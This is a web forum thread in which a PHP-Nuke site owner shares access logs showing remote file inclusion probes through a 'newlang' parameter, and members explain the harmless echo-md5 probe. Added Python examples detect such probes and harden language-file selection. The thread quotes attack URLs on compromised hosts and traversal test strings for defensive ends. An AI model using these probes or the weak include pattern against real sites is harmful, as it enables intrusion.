Ravens PHP Scripts: Forums
Security - PHP Nuke
lofty3109
New Member

Joined: Nov 18, 2007
Posts: 7
Location: Sweden

PostPosted: Fri Dec 14, 2007 5:44 am

Hi there,

I am using vers 2.10.01 and the latest Sentinel installed but I woke up this morning to find someone had tried to hack my site. I don't know exactly what they have done but the site is now throwing up a 500 Internal Server Error, though upon checking they appear to have deleted the .htaccess and .staccess files on the server. I was going to re-up a backup of the site but wondered, if they got in they might be waiting for me to do that and try something again. I have checked the cPanel logs and the following is what it's saying, I hope this isn't too much info!

165.228.128.11 - - [13/Dec/2007:21:39:45 -0500] "GET /index.php?newlang=http%3A%2F%2Flnx.sarapica.net%2Fart%2Fufo%2Fuco%2F HTTP/1.1" 200 1322 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
202.71.147.77 - - [13/Dec/2007:21:39:47 -0500] "GET /index.php?newlang=http%3A%2F%2Fbtnflower.com%2Fpay%2Flog%2Forak%2Ftoja%2F HTTP/1.0" 500 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
165.228.133.11 - - [13/Dec/2007:21:39:48 -0500] "GET /index.php?newlang=http%3A%2F%2Fwww.insanechicken.com%2F%2FphpMyAdmin%2Flibraries%2Fanera%2Fijuraz%2F HTTP/1.1" 500 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
74.208.44.48 - - [13/Dec/2007:21:39:52 -0500] "GET /index.php?newlang=http%3A%2F%2Fwww.ujoo.co.kr%2Fimages%2Fbar%2Fojilub%2Fizemuf%2F HTTP/1.1" 500 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"


Checking the IP in the email Sentinel sent me when it blocked them said they originate from Australia (165.228.128.11). There are 2 lines in the email which say the following:

Query String: w*w.dicamus.eu/index.php?newlang=http://lnx.sarapica.net/art/ufo/uco/
Get String: w*w.dicamus.eu/index.php?newlang=http://lnx.sarapica.net/art/ufo/uco/

Does anyone know what h**p://lnx.sarapica.net/art/ufo/uco/ is? I don't have a clue.

The site I had only had a main page, nothing else, no forum, chat page, gallery, nothing.

Does anyone have any ideas what they have done/tried to do? Should I restore a backup? Any help or info would be appreciated. I have also informed my host and am awaiting their reply but thought I would ask you guys as well.

Thanks,

Anthony

_________________
The rewards in business go to the man who does something with an idea.

-William Benton- 
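The four log lines above all share one shape: the `newlang` parameter carries a URL-encoded `http://` address of a third-party host, which is the signature of a remote file inclusion probe rather than a language name. The script below is an added example for this thread, not code from RavenNuke or NukeSentinel: it parses Apache combined-format lines, decodes the query string, and flags any `newlang` value that points at another host or wrapper, then tallies the offending source IPs. The sample log is constructed from the entries Anthony posted plus one benign request.

```python
"""Flag remote-file-inclusion probes against a 'newlang'-style parameter
in Apache combined-format access log lines.

Added example for this thread (not RavenNuke or NukeSentinel code).
SAMPLE_LOG is constructed from the lines quoted in the post above plus
one benign request; the benign IP 10.0.0.5 is made up."""
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qs, unquote

SAMPLE_LOG = """\
165.228.128.11 - - [13/Dec/2007:21:39:45 -0500] "GET /index.php?newlang=http%3A%2F%2Flnx.sarapica.net%2Fart%2Fufo%2Fuco%2F HTTP/1.1" 200 1322 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
202.71.147.77 - - [13/Dec/2007:21:39:47 -0500] "GET /index.php?newlang=http%3A%2F%2Fbtnflower.com%2Fpay%2Flog%2Forak%2Ftoja%2F HTTP/1.0" 500 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
165.228.133.11 - - [13/Dec/2007:21:39:48 -0500] "GET /index.php?newlang=http%3A%2F%2Fwww.insanechicken.com%2F%2FphpMyAdmin%2Flibraries%2Fanera%2Fijuraz%2F HTTP/1.1" 500 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
74.208.44.48 - - [13/Dec/2007:21:39:52 -0500] "GET /index.php?newlang=http%3A%2F%2Fwww.ujoo.co.kr%2Fimages%2Fbar%2Fojilub%2Fizemuf%2F HTTP/1.1" 500 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
10.0.0.5 - - [13/Dec/2007:21:40:01 -0500] "GET /index.php?newlang=english HTTP/1.1" 200 8823 "-" "Mozilla/5.0"
"""

# Apache combined format: ip ident user [ts] "METHOD target PROTO" status bytes ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# A language name never starts with a scheme; anything like http://, ftp://
# or php:// in this parameter is an attempt to make the include fetch
# something that is not on this server.
REMOTE_RE = re.compile(r'^[a-z][a-z0-9+.-]*://', re.I)


def parse_line(line):
    """Return a dict for one log line, or None if it is not a request line."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    return {
        "ip": m.group("ip"),
        "ts": m.group("ts"),
        "status": int(m.group("status")),
        "path": parts.path,
        # parse_qs already URL-decodes the values once
        "query": parse_qs(parts.query, keep_blank_values=True),
    }


def rfi_hits(log_text, param="newlang"):
    """Every request whose `param` value points at a remote location."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        for value in rec["query"].get(param, []):
            decoded = unquote(value)  # second pass catches double-encoding
            if REMOTE_RE.match(decoded):
                hits.append({
                    "ip": rec["ip"],
                    "ts": rec["ts"],
                    "status": rec["status"],
                    "param": param,
                    "value": decoded,
                    "host": urlsplit(decoded).hostname,
                })
    return hits


def hits_by_ip(hits):
    """Count probes per source IP, the list you would feed a blocker."""
    return Counter(h["ip"] for h in hits)


if __name__ == "__main__":
    found = rfi_hits(SAMPLE_LOG)
    for h in found:
        print("%s %s -> %s (status %d)" % (h["ts"], h["ip"], h["host"], h["status"]))
    print(hits_by_ip(found))
```

The `host` field is the list of third-party sites hosting the probe file, which is what Raven later suggests contacting; the status code tells you whether the request reached the application (200) or died earlier (500). Run it over a real access log by replacing `SAMPLE_LOG` with the file contents.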
Dawg
RavenNuke(tm) Development Team

Joined: Nov 07, 2003
Posts: 910

PostPosted: Fri Dec 14, 2007 6:06 am

Hmmmmm.....I would restore from backup and set the string blocker to ban sarapica

At first look it looks like a remote injection attempt but the url comes back to....
Code:
<?php echo md5("just_a_test");?>


Code:
http%3A%2F%2Fbtnflower.com%2Fpay%2Flog%2Forak%2Ftoja%2F 
Comes back with the same....

I do not know if this would do anything...I will let someone in the know reply to that part....

Dave
 
lofty3109
PostPosted: Fri Dec 14, 2007 10:06 am

Thanks Dawg for the speedy reply. I restored a backup but it was corrupt. I have just reinstalled everything again, hopefully everything will be ok

Anthony
 
Dawg
PostPosted: Fri Dec 14, 2007 10:09 am

Anyone can BackUp...it is those that can restore that matter!

Dawg
 
lofty3109
PostPosted: Fri Dec 14, 2007 12:27 pm

Hahaha you are right Dawg!!

I have just been hit 3 times in succession, luckily Sentinel blocked them. The IPs (if anyone wants to block them too) are:

194.150.247.1
211.142.116.205
201.134.177.1

Not checked them out yet

Anthony
 
evaders99
Former Moderator in Good Standing

Joined: Apr 30, 2004
Posts: 3221

PostPosted: Fri Dec 14, 2007 3:04 pm

Hmm RavenNuke should be protected from that. "newlang" is an old vulnerability.
If you see any other attacks to different scripts that worked, let us know

Dawg
PostPosted: Fri Dec 14, 2007 3:45 pm

Code:
<?php echo md5("just_a_test");?>


evaders99,
What were they trying to do with this?

Dawg
 
montego
Site Admin

Joined: Aug 29, 2004
Posts: 9457
Location: Arizona

PostPosted: Fri Dec 14, 2007 7:34 pm

I think they were just probing whether an include of their file would actually work. But, why the md5 function is interesting...

I have checked the RN code around $newlang and I just cannot see at first glance how it can be exploited. Definitely let us know (in private please) if you find anything else.

lofty3109
PostPosted: Fri Dec 14, 2007 10:54 pm

Dawg wrote:
Code:
<?php echo md5("just_a_test");?>


evaders99,
What were they trying to do with this?

Dawg


I wondered the same when I clicked on the links in the emails Sentinel sent me when they blocked the last 3 IP's, interesting.

Thanks alot for all the help/info, much appreciated.

Anthony
 
Raven
Site Admin/Owner

Joined: Aug 27, 2002
Posts: 17086

PostPosted: Fri Dec 14, 2007 11:48 pm

Dawg wrote:
What were they trying to do with this?

Since the code was exposed it seems obvious that their script did not work. If it had it would have shown c6db3524fe71d6c576098805a07e79e4. md5() in *nuke is only used for passwords so my guess is that they were probing in order to develop their next baby, or should I say kiddie, step

I would guess that they have successfully exploited these sites and are basically using them as mindless drones. I doubt that the owners of the sites even know they have been compromised.

http%3A%2F%2Flnx.sarapica.net%2Fart%2Fufo%2Fuco%2F
which is h*tp://lnx.sarapica.net/art/ufo/uco/

http%3A%2F%2Fbtnflower.com%2Fpay%2Flog%2Forak%2Ftoja%2F
which is h*tp://btnflower.com/pay/log/orak/toja/

http%3A%2F%2Fwww.insanechicken.com%2F%2FphpMyAdmin%2Flibraries%2Fanera%2Fijuraz%2F
which is h*tp://www.insanechicken.com//phpMyAdmin/libraries/anera/ijuraz/

http%3A%2F%2Fwww.ujoo.co.kr%2Fimages%2Fbar%2Fojilub%2Fizemuf%2F
which is h*tp://www.ujoo.co.kr/images/bar/ojilub/izemuf/

Try to contact the owners of the above mentioned sites and let them know that they have been compromised and are being used in an attempt to exploit other sites and that they will be implicated in Internet terrorism. Yes, these acts are classified as terrorism. Don't ya just love it?
 
evaders99
PostPosted: Fri Dec 14, 2007 11:53 pm

Yep simple probe scripts. These testers just want some valid data to show their attacks worked. It could be a simple echo, so why md5? Who knows.
 
lofty3109
PostPosted: Sat Dec 15, 2007 6:31 am

Many, many thanks for all your help, it's very much appreciated.

It's nice to know there's a group of people like you lot who take the time to help people like myself.

@ Raven,

I will try and inform the owners of the sites that have been compromised, I am sure they would be interested to know!

Anthony
 
Raven
PostPosted: Sat Dec 15, 2007 7:36 am

RavensScripts
 
vaudevillian
Worker

Joined: Jan 18, 2008
Posts: 143

PostPosted: Fri Jan 18, 2008 7:43 pm

They are still at it.....

195.235.59.37 from this IP
Sentinel picking up this hack attempt and sending me the link of the contained info:

Code:
<?php echo md5 ("just_a_test");?>


Isn't the md5 part of the cgi folder?
 
evaders99
PostPosted: Fri Jan 18, 2008 9:39 pm

They are all automated these days. No way to stop them.

That is just a probe to tell the automated script: "hey this user is vulnerable"
Once this tester is done (it isn't malicious itself), then the script can run whatever file with other commands to continue the hack.

md5 has no importance here. They could have easily just echo'd out any text.
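The probe works only if the application lets the request value decide *where* a file is loaded from; a page that merely selects among files it already ships cannot be made to fetch `lnx.sarapica.net/...` no matter what the probe returns. The following is an added example for this thread, not RavenNuke's actual `$newlang` handling: it models in Python the weak pattern (the request value is glued straight into a path) next to the hardened one (allow-listed name, resolved path confined to the language directory, fallback to the default). The language directory and file names are constructed for the demo.

```python
"""Weak vs. hardened handling of a user-supplied language name.

Added example for this thread, not RavenNuke code. It models the
'newlang' pattern in Python: a request parameter must only *select*
among files the server already has, never contribute a path or URL.
The demo directory and the language names are constructed."""
import os
import re
import tempfile

# Assumption for the demo: legitimate language names are short lowercase words.
LANG_NAME_RE = re.compile(r'^[a-z]{2,16}$')


def build_lang_path_weak(lang_dir, newlang):
    """Weak: trusts the request value, so a scheme, traversal or absolute
    path travels straight into whatever loads the file."""
    return os.path.join(lang_dir, "lang-" + newlang + ".php")


def resolve_lang_path(lang_dir, newlang, default="english"):
    """Hardened: validate the name, resolve the path, confine it, and fall
    back to the default language whenever any check fails."""
    if not LANG_NAME_RE.match(newlang or ""):
        newlang = default
    root = os.path.realpath(lang_dir)
    candidate = os.path.realpath(os.path.join(root, "lang-%s.php" % newlang))
    # Containment: the resolved file must sit inside the language directory
    # and must already exist there. Anything else gets the default.
    inside = os.path.commonpath([root, candidate]) == root
    if not inside or not os.path.isfile(candidate):
        candidate = os.path.realpath(os.path.join(root, "lang-%s.php" % default))
    return candidate


def make_demo_dir():
    """Constructed language directory with two stub language files."""
    d = tempfile.mkdtemp(prefix="langdemo-")
    for name in ("english", "swedish"):
        with open(os.path.join(d, "lang-%s.php" % name), "w") as f:
            f.write("<?php // constructed stub language file\n")
    return d


def demo():
    """Run the hardened resolver over a mix of legitimate and hostile values;
    returns {value: chosen file name} so the outcome can be checked."""
    d = make_demo_dir()
    probes = [
        "swedish",                                   # legitimate selection
        "http://lnx.sarapica.net/art/ufo/uco/",      # remote URL from the thread
        "../../../etc/passwd",                       # traversal attempt
        "klingon",                                   # valid-looking name, no file
        "",                                          # missing value
    ]
    return {p: os.path.basename(resolve_lang_path(d, p)) for p in probes}


if __name__ == "__main__":
    print("weak  :", build_lang_path_weak("/srv/language", "http://lnx.sarapica.net/art/ufo/uco/"))
    for value, chosen in demo().items():
        print("hardened: %-40r -> %s" % (value, chosen))
```

The regex check alone is what stops the remote URL and the traversal string; the `realpath` containment and `isfile` checks are the second layer for names that look valid but do not correspond to a shipped file, and they also make the function safe if the allow-list is later loosened.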
 
vaudevillian
PostPosted: Fri Jan 18, 2008 10:21 pm

so if Sentinel picked it up that means I'm safe right?
 
evaders99
PostPosted: Sat Jan 19, 2008 9:39 pm

Yes. Just keep your site patched and you'll be fine
 
vaudevillian
PostPosted: Sun Jan 20, 2008 11:08 am

it's up to date. just waiting for the next version of ravennuke
Powered by phpBB © 2001-2007 phpBB Group
All times are GMT - 6 Hours